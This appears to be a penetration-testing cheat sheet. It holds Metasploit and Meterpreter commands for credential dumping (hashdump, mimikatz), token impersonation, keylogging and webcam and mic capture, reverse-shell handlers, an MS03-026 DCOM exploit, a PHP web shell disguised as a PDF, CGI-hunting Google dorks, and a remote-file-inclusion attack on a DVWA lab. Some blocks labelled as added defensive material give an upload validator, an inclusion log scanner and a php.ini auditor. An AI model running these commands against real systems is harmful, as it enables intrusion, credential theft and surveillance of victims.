[+] Meterpreter Shell

meterpreter > sysinfo

meterpreter > getuid

meterpreter > getsystem

meterpreter > hashdump

meterpreter > load/use mimikatz

    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter > wdigest

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token SERV-2K3\Administrator
meterpreter > execute -f cmd.exe -i -t

Metasploit Exploit Multi Handler

multi/handler to accept an incoming reverse_https meterpreter payload:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/
```

Building Your Own MSF Module

```
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb
```

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)

    `download` Download a file or directory
    `upload` Upload a file or directory
    `portfwd` Forward a local port to a remote service
    `route` View and modify the routing table
    `keyscan_start` Start capturing keystrokes
    `keyscan_stop` Stop capturing keystrokes
    `screenshot` Grab a screenshot of the interactive desktop
    `record_mic` Record audio from the default microphone for X seconds
    `webcam_snap` Take a snapshot from the specified webcam
    `getsystem` Attempt to elevate your privilege to that of local system.
    `hashdump` Dumps the contents of the SAM database

search dcom

```
msf > search dcom
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.0.0.3
msf > show payloads
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST 10.0.0.6
msf > exploit
sessions -i 1
C:\>dir
```

```
$ wc lfi.pdf
 4  4 42 lfi.pdf
$ cat lfi.pdf
%PDF-1.4
<?php
  system($_GET["cmd"]);
?>
```
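The four-line `lfi.pdf` above passes any check that only looks at the leading bytes, because it really does start with `%PDF-`. As an added defensive example (not from the original notes), the Python below contrasts that weak magic-byte check with a layered upload validator that also refuses a PHP open tag anywhere in the body. The sample bytes are constructed to match the file shown above byte for byte (42 bytes, as `wc` reports); the function names are hypothetical.

```python
import re

# Constructed sample: byte-for-byte the four-line "lfi.pdf" shown above (42 bytes)
POLYGLOT = b'%PDF-1.4\n<?php\n  system($_GET["cmd"]);\n?>\n'

# Constructed sample: a minimal benign PDF skeleton with a proper trailer
BENIGN_PDF = (b'%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n'
              b'trailer\n<< /Root 1 0 R >>\n%%EOF\n')

# PHP open tags: "<?php", the short-echo tag "<?=", or a bare "<?" followed by
# whitespace. "<?xml" / "<?xpacket" (XMP metadata inside real PDFs) do not match.
PHP_OPEN_TAG = re.compile(rb'<\?(?:php\b|=|\s)', re.IGNORECASE)


def magic_only_check(data: bytes) -> bool:
    """The weak check: trusts the leading bytes alone, so the polyglot passes."""
    return data.startswith(b'%PDF-')


def validate_pdf_upload(data: bytes) -> tuple[bool, str]:
    """Layered check: PDF header, no PHP open tag in the body, and a PDF trailer.

    Returns (accepted, reason). The PHP-tag check runs before the trailer check
    so the reason reported for a polyglot is the one worth alerting on.
    """
    if not data.startswith(b'%PDF-'):
        return False, "missing %PDF- header"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag embedded in body"
    if b'%%EOF' not in data:
        return False, "missing %%EOF trailer"
    return True, "ok"


if __name__ == "__main__":
    for label, blob in (("polyglot", POLYGLOT), ("benign", BENIGN_PDF)):
        print(f"{label:9s} magic-only={magic_only_check(blob)} "
              f"layered={validate_pdf_upload(blob)}")
```

Content scanning like this is a second layer only: the inclusion primitive itself is what executes the file, so the primary fixes are to never pass user-controlled values to `include()`/`require()`, to store uploads outside the web root where no PHP handler runs, and to keep `allow_url_include` off.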

msfnginx

sitemap.xml filetype:xml
intext:"cgi-bin" filetype:sh
inurl:cgi-bin filetype:sh
intext:cgi-bin intitle:apache "cgi-bin"
inurl:cgi-bin inurl:wspd_cgi.sh
inurl:wslb.sh
inurl:"server-status" intitle:apache "cgi-bin"
inurl:cgi-bin "GATEWAY_INTERFACE = CGI"
inurl:cgi-bin inurl:printenv intext:SERVER_ADDR

http://172.16.1.102/dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php

exploit/linux/http/nginx_chunked_size
auxiliary/scanner/http/wordpress_ghost_scanner
```
sudo nano /etc/php5/cgi/php.ini
```
Make sure allow_url_fopen and allow_url_include are both set to On, then press Ctrl-X, Y, and Enter to save.
```
sudo /etc/init.d/apache2 restart
nano /var/www/html/test.php
service apache2 restart
```
```
msf exploit(unix/webapp/php_include) > set rhost 172.16.1.102
msf exploit(unix/webapp/php_include) > set headers "Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee"
headers => Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee
msf exploit(unix/webapp/php_include) > set path /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set phpuri /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/bind_php
msf exploit(unix/webapp/php_include) > run
```
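As an added defensive counterpart to the lab setup above (not part of the original notes), the Python below does two things a blue team would want after seeing this: it flags file-inclusion attempts in Apache combined-format access logs, such as the `?page=http://172.16.1.100/test.php` request used against DVWA, and it audits a php.ini excerpt for the two directives the lab turns On. The log lines, the ini excerpts and the function names are constructed for this example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format, reduced to the fields used here
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# A value like this would make include() fetch a remote resource or a stream wrapper
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp|php|data|expect|phar|file)://', re.IGNORECASE)
# A value like this steps out of the directory the application intended
TRAVERSAL = re.compile(r'\.\.(?:/|\\)')

# Constructed sample lines (not real traffic). Line 1 mirrors the DVWA request in the
# notes above, line 2 is a URL-encoded traversal attempt, line 3 is a normal page load.
SAMPLE_LOG = """\
172.16.1.100 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.1.100 - - [10/Oct/2023:13:55:40 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""


def classify_value(value: str) -> Optional[str]:
    """Return 'rfi', 'lfi' or None for one query-parameter value."""
    v = unquote(value).strip()   # parse_qsl decoded once; decode again to catch double-encoding
    if REMOTE_SCHEME.match(v):
        return "rfi"
    if TRAVERSAL.search(v) or "\x00" in v:
        return "lfi"
    return None


def scan_log(text: str) -> list[dict]:
    """Flag every query parameter whose value looks like a file-inclusion payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip it
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({"src": m["ip"], "time": m["ts"], "path": parts.path,
                                 "param": name, "kind": kind, "value": value})
    return findings


# Directives that let include() reach beyond local files (the lab above turns both On)
RISKY_DIRECTIVES = ("allow_url_include", "allow_url_fopen")

# Constructed php.ini excerpts: the lab setting, and the hardened setting
WEAK_INI = "; constructed excerpt\nallow_url_fopen = On\nallow_url_include = On\n"
HARDENED_INI = "; constructed excerpt\nallow_url_fopen = Off\nallow_url_include = Off\n"


def audit_php_ini(text: str) -> list[str]:
    """Return the risky directives that are enabled in a php.ini text, in file order."""
    enabled = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()       # drop comments
        key, sep, val = line.partition("=")
        if not sep:
            continue
        key = key.strip().lower()
        val = val.strip().strip('"').lower()
        if key in RISKY_DIRECTIVES and val in ("on", "1", "true", "yes"):
            enabled.append(key)
    return enabled


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['kind'].upper()} from {f['src']} at {f['time']}: {f['path']}?{f['param']}={f['value']}")
    print("weak php.ini enables:", audit_php_ini(WEAK_INI))
    print("hardened php.ini enables:", audit_php_ini(HARDENED_INI))
```

`allow_url_include` is the directive that turns a remote URL passed to `include()` into code execution; `allow_url_fopen` is On by default and many applications need it for `file_get_contents()` on URLs, so treat the second hit as a review item rather than an automatic failure.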